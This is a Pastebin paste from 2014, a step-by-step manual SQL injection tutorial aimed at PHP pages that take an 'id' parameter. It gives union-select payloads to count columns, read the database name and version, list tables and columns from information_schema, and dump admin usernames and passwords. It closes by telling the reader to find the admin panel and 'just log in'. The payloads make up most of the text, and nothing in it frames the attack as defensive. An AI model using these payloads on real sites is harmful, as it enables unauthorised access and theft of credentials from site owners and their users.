SHARE
TWEET

Basic SQL Injection (Manual)

acerz Jul 9th, 2014 2,973 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Basic SQL Injection Tutorial by "Linux & Hacking Tutorials"
  2.  
  3. 1) Counting columns: Increase the number untill you get an ERROR
  4. .php?id=1 order by 1-- ->no error
  5. .php?id=1 order by 2-- ->no error
  6. .php?id=1 order by 3-- ->no error
  7. .php?id=1 order by 4-- ->no error
  8. .php?id=1 order by 5-- ->ERROR!
  9. We got an error on 5, so the column count is 4!
  10.  
  11. 2)Finding vulnerable column: add - before ID number, replace order by with union all select and start counting 4 columns: 1,2,3,4
  12. .php?id=-1 union all select 1,2,3,4--
  13. Page sends vulnerable column: 2
  14.  
  15. 3)Gathering info about database: replace 2 in the syntax with group_concat() and add custom text inside the brackets
  16. .php?id=-1 union all select 1,group_concat(database(),0x3a,user(),0x3a,version()),3,4--
  17. Then we got database name, user and version.
  18.  
  19. 4)Gathering tables from database: put table_name inside the brackets and add "from information_schema.tables where table_schema=database()--" to the rest of the URL before --
  20. .php?id=-1 union all select 1,group_concat(talbe_name),3,4 from information_schema.tables where table_schema=database()--
  21. Page sends tables: news,articles,photos,admins
  22.  
  23. 5)Gathering columns from admin's table: In this case the admin login should be in admins table
  24. replace every "table" with "column" and add "from information_schema.columns where table_name=0xHEX--" to the rest of the URL
  25. The HEX represents HEX value of admins table which is 61646d696e73
  26. HEX converter: http://www.swingnote.com/tools/texttohex.php
  27. .php?id=-1 union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x61646d696e73--
  28. Page sends: id,user,password
  29.  
  30. 6)Gathering admins' logins: put user,password in the brackets and add "from (table name here)--" to the rest of the URL
  31. .php?id=-1 union all select 1,group_concat(user,0x3a,password),3,4 from admins--
  32. Page sends: admin1:123456
  33. So, that means the user is admin1 and the password is 123456
  34.  
  35. 7)Finding admin panel: You can use tools like this: http://www.scan.subhashdasyam.com/admin-panel-finder.php or do it manualy with
  36. /admin
  37. /admin.php
  38. /login
  39. /login.php
  40. /cms
  41. /adm
  42. ...
  43. When you find the panel, just log in :)
  44. That's all
  45. Video Tutorial: http://youtu.be/YMoJrJE0qfA
  46. Facebook group on hacking tutorials: https://www.facebook.com/groups/706155462750576/
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top